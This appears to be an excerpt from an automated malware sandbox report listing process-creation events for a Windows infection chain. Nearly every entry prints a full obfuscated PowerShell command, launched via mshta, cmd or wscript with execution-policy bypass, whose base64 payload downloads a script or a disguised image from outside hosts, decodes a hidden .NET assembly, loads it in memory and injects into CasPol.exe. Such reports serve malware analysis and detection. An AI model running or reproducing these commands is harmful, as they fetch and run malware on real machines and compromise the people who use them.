                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleateJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCF3
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03000A9D pushad ; iretd 3_2_03000ABD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03000AD5 pushad ; iretd 3_2_03000ABD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07572506 push esp; iretd 3_2_07572515
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0424144C push FFFFFFF5h; iretd 8_2_0424145E
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0424137C push ebx; iretd 8_2_042413DA
